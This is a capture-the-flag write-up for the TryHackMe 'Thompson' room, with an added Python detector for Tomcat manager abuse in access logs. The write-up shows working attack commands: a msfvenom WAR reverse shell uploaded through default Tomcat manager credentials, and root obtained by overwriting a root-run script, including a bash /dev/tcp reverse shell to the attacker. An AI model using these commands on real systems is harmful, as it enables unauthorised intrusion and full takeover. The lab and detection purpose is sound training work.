Thompson
- https://tryhackme.com/room/bsidesgtthompson
Recon
So we start off as we normally do, with a quick Nmap scan of our target.
sudo nmap -vv -sV -Pn <Target IP>
The scan results show a web server running Apache Tomcat 8.5.5 on port 8080.
So if we head over to <Target IP>:8080 we are greeted with the default Tomcat home page.
From here since I am dealing with a webpage I decide to view the page source for any comments or anything left behind that could be useful.
I am unable to find any comments or anything of that nature, so I head over to /manager/html.
Upon clicking the link, either on the homepage or within the page source, you will be greeted by a login prompt. We obviously don't have the credentials right now, so I hit cancel. I am then redirected to the page Tomcat returns for /manager/html, where I can find the default login credentials.
Once I am logged into the manager portal, I can see that it lets me upload a .war file.
Reverse Shell
So I create the reverse shell payload with msfvenom and upload it to the server.
msfvenom -p java/jsp_shell_reverse_tcp lhost=<Your IP> lport=<port you want to listen on> -f war -o <nameoffile.war>
With our malicious file uploaded, we can set up our listener.
nc -lvnp <port you want to listen on>
Activate your .war file by clicking it in the applications table.
We now have our shell.
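From the defender's side, the steps above leave a clear trail in Tomcat's access log. The following is an added example, not part of the original writeup: it parses constructed log lines in Tomcat's default "common" pattern and reports any client that deployed an application through the manager, together with the failed logins that preceded it. The sample addresses, user name, CSRF nonce and timestamps are made up.

```python
import re

# Constructed sample lines in Tomcat's "common" access-log pattern (%h %l %u %t "%r" %s %b).
# Addresses, user name, nonce and timestamps are made up for this example.
SAMPLE_LOG = """\
10.10.14.5 - - [02/Jan/2024:10:15:32 +0000] "GET / HTTP/1.1" 200 11230
10.10.14.5 - - [02/Jan/2024:10:15:38 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - - [02/Jan/2024:10:15:41 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [02/Jan/2024:10:15:49 +0000] "GET /manager/html HTTP/1.1" 200 20417
10.10.14.5 - tomcat [02/Jan/2024:10:16:05 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABCD HTTP/1.1" 302 -
10.10.14.5 - tomcat [02/Jan/2024:10:16:07 +0000] "GET /manager/html/start?path=/shell HTTP/1.1" 302 -
10.10.14.5 - - [02/Jan/2024:10:16:12 +0000] "GET /shell/ HTTP/1.1" 200 -
192.168.1.20 - - [02/Jan/2024:11:02:00 +0000] "GET /docs/ HTTP/1.1" 200 19084
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that deploy or start applications (paths of Tomcat's manager webapp).
DEPLOY_PATHS = {"/manager/html/upload", "/manager/text/deploy"}
START_PATHS = {"/manager/html/start", "/manager/text/start"}

def analyse(log_text):
    """Per client host: 401s against the manager, deployment times and started app paths."""
    findings = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m.group("path").startswith("/manager/"):
            continue
        rec = m.groupdict()
        f = findings.setdefault(rec["host"], {"failed_logins": 0, "deploys": [], "starts": []})
        path = rec["path"].split("?", 1)[0]  # drop the CSRF nonce and other query parameters
        if rec["status"] == "401":
            f["failed_logins"] += 1
        elif rec["method"] in ("POST", "PUT") and path in DEPLOY_PATHS:
            f["deploys"].append(rec["time"])
        elif path in START_PATHS:
            f["starts"].append(rec["path"])
    return findings

def alerts(findings):
    """One alert per host that deployed an application through the manager."""
    return [f"{host}: {len(f['deploys'])} deployment(s) after {f['failed_logins']} failed "
            f"login(s); started {f['starts']}"
            for host, f in findings.items() if f["deploys"]]
```

Running `alerts(analyse(SAMPLE_LOG))` on the sample yields a single alert for 10.10.14.5; on a real host, point it at Tomcat's `localhost_access_log.*.txt` files instead of the constructed string.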
Stabilize your shell
Let's stabilize our shell to improve our quality of life.
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo ; fg
export TERM=xterm
User flag
Let's search for the first flag; we know it's called user.txt.
find / -type f -name user.txt 2>/dev/null
cat /home/jack/user.txt and you have your first flag.
Root flag
Along with the user.txt file we find two other files, an id.sh and a test.txt file. After viewing the contents of each, we can see that id.sh is a bash script that sends its output to test.txt, and that it is being run with root privileges. This means we can poison the script to give us either a root shell or just the root flag; I will go over how to do both. I will start with just getting the root flag, since that completes the room and full root control isn't necessary for it.
echo "cat /root/root.txt > test.txt" > id.sh
cat test.txt and you will have the root flag.
Root Shell
Obtaining a root shell uses the same concept as having id.sh write the output of the cat command to test.txt; instead, we replace that command with a bash reverse shell.
echo "bash -i >& /dev/tcp/<Your IP>/<listener port> 0>&1" > id.sh
Now set up another listener, wait a moment, and you have a shell as root.